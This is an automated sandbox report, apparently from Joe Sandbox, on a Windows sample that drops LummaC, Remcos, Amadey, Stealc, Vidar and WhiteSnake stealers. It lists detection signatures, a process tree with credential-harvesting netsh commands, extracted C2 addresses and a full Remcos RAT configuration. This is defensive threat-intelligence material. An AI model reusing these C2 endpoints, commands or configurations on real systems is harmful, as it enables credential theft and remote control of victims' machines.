Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1550706
MD5:	d21a2eb1558c04af68aa39932c381a77
SHA1:	8a1c7f2c06fcf55ccdfb8155a2aa2ec94cb8c5bb
SHA256:	ba62e9e2f8ace5672fbc814db0b5fbd5a2d0a5d2d8ef55fd359e91ac756b4bbc
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected Remcos RAT

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Remcos RAT

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected WhiteSnake Stealer

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious names

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Installs a global keyboard hook

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses dynamic DNS services

Uses netsh to modify the Windows network and firewall settings

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Enables driver privileges

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D21A2EB1558C04AF68AA39932C381A77)

chrome.exe (PID: 5812 cmdline: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2156,i,3658342765424133982,5433564740709363588,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 8016 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsFHIEBKKFHI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsFHIEBKKFHI.exe (PID: 1508 cmdline: "C:\Users\user\DocumentsFHIEBKKFHI.exe" MD5: D1C392CD0570CDFD8CC42A3D5DFCB0FF)

skotes.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: D1C392CD0570CDFD8CC42A3D5DFCB0FF)

skotes.exe (PID: 7336 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: D1C392CD0570CDFD8CC42A3D5DFCB0FF)

remcos_a.exe (PID: 7184 cmdline: "C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe" MD5: B85C47881BA0EB0B556B83827F8E75C8)

remcos.exe (PID: 7280 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: B85C47881BA0EB0B556B83827F8E75C8)

buildd.exe (PID: 8080 cmdline: "C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe" MD5: C426F46F2C074EDA8C903F9868BE046D)

cmd.exe (PID: 6616 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2368 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 8044 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 8016 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 4412 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2844 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 2196 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 3844 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

ed55d3f620.exe (PID: 1780 cmdline: "C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe" MD5: A17F03DADDF4FFD5B038F13CA94CCA7D)

c2a8de8bf3.exe (PID: 3904 cmdline: "C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe" MD5: D21A2EB1558C04AF68AA39932C381A77)

skotes.exe (PID: 2164 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: D1C392CD0570CDFD8CC42A3D5DFCB0FF)

315ef68721.exe (PID: 4592 cmdline: "C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe" MD5: 941E61557EF13F76A606C961A64ED6AB)

remcos.exe (PID: 7640 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: B85C47881BA0EB0B556B83827F8E75C8)

ed55d3f620.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe" MD5: A17F03DADDF4FFD5B038F13CA94CCA7D)

c2a8de8bf3.exe (PID: 6228 cmdline: "C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe" MD5: D21A2EB1558C04AF68AA39932C381A77)

315ef68721.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe" MD5: 941E61557EF13F76A606C961A64ED6AB)

remcos.exe (PID: 180 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: B85C47881BA0EB0B556B83827F8E75C8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Threatname: LummaC

{"C2 url": ["fadehairucw.store", "presticitpo.store", "scriptyprefej.store", "thumbystriw.store", "crisiwarny.store", "navygenerayk.store", "founpiuer.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}

Threatname: Vidar

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: Remcos

{"Host:Port:Password": ["dpdnow.duckdns.org:8452:1"], "Assigned name": "DPDNOW", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-A34JIZ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1988015001.0000000000771000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1669066105.00000000051D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a6f8:$a1: Remcos restarted by watchdog! 0x6ac70:$a3: %02i:%02i:%02i:%03i
0000001E.00000003.2700117064.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000002.2629001763.00000000003F1000.00000040.00000001.01000000.00000016.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000C.00000002.2469760286.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000020.00000002.2791492042.00000000003F1000.00000040.00000001.01000000.00000016.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000020.00000003.2738544511.0000000004E30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000002.2902465184.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000003.2700281753.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2926361931.0000000000C94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001E.00000003.2684584505.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.2625408884.0000000000988000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001E.00000003.2683114049.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000002.2630997068.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000002.2908134178.0000000005EF1000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a6f8:$a1: Remcos restarted by watchdog! 0x6ac70:$a3: %02i:%02i:%02i:%03i
00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000002.2046814392.00000000008B1000.00000040.00000001.01000000.0000000C.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.2089934901.0000000000B21000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001A.00000002.2855529774.0000000005CA1000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001C.00000003.2576226521.0000000004E30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001A.00000003.2639955106.0000000000807000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1989629326.000000000152E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000003.2858928335.00000000082F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000003.2716445296.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a6f8:$a1: Remcos restarted by watchdog! 0x6ac70:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a6f8:$a1: Remcos restarted by watchdog! 0x6ac70:$a3: %02i:%02i:%02i:%03i
0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a6f8:$a1: Remcos restarted by watchdog! 0x6ac70:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.2923039342.0000000000B21000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a6f8:$a1: Remcos restarted by watchdog! 0x6ac70:$a3: %02i:%02i:%02i:%03i
0000001A.00000003.2794443992.00000000081E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000003.2714618817.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2684189980.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000D.00000002.2934103657.0000000004C2F000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a6f8:$a1: Remcos restarted by watchdog! 0x6ac70:$a3: %02i:%02i:%02i:%03i
Process Memory Space: file.exe PID: 6816	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6816	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6816	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6816	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: remcos_a.exe PID: 7184	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: remcos_a.exe PID: 7184	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: remcos_a.exe PID: 7184	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x3a124:$a1: Remcos restarted by watchdog! 0x6bcc9:$a1: Remcos restarted by watchdog! 0x3a681:$a3: %02i:%02i:%02i:%03i 0x3aa39:$a3: %02i:%02i:%02i:%03i 0x6c226:$a3: %02i:%02i:%02i:%03i 0x6c5de:$a3: %02i:%02i:%02i:%03i
Process Memory Space: remcos.exe PID: 7280	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: remcos.exe PID: 7280	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: remcos.exe PID: 7280	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x438ab:$a1: Remcos restarted by watchdog! 0x51589:$a1: Remcos restarted by watchdog! 0x43e08:$a3: %02i:%02i:%02i:%03i 0x441c0:$a3: %02i:%02i:%02i:%03i 0x51ae6:$a3: %02i:%02i:%02i:%03i 0x51e9e:$a3: %02i:%02i:%02i:%03i
Process Memory Space: buildd.exe PID: 8080	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: buildd.exe PID: 8080	JoeSecurity_WhiteSnake	Yara detected WhiteSnake Stealer	Joe Security
Process Memory Space: ed55d3f620.exe PID: 1780	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: ed55d3f620.exe PID: 1780	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ed55d3f620.exe PID: 1780	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ed55d3f620.exe PID: 1780	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ed55d3f620.exe PID: 1780	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: remcos.exe PID: 7640	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: remcos.exe PID: 7640	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: remcos.exe PID: 7640	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x2baec:$a1: Remcos restarted by watchdog! 0x405c7:$a1: Remcos restarted by watchdog! 0x2c049:$a3: %02i:%02i:%02i:%03i 0x2c401:$a3: %02i:%02i:%02i:%03i 0x40b24:$a3: %02i:%02i:%02i:%03i 0x40edc:$a3: %02i:%02i:%02i:%03i
Process Memory Space: c2a8de8bf3.exe PID: 3904	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: c2a8de8bf3.exe PID: 3904	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: ed55d3f620.exe PID: 5744	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: ed55d3f620.exe PID: 5744	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: ed55d3f620.exe PID: 5744	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ed55d3f620.exe PID: 5744	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ed55d3f620.exe PID: 5744	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ed55d3f620.exe PID: 5744	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: c2a8de8bf3.exe PID: 6228	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: c2a8de8bf3.exe PID: 6228	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: remcos.exe PID: 180	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: remcos.exe PID: 180	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: remcos.exe PID: 180	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x10a3d:$a1: Remcos restarted by watchdog! 0x10f9a:$a3: %02i:%02i:%02i:%03i 0x11352:$a3: %02i:%02i:%02i:%03i
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
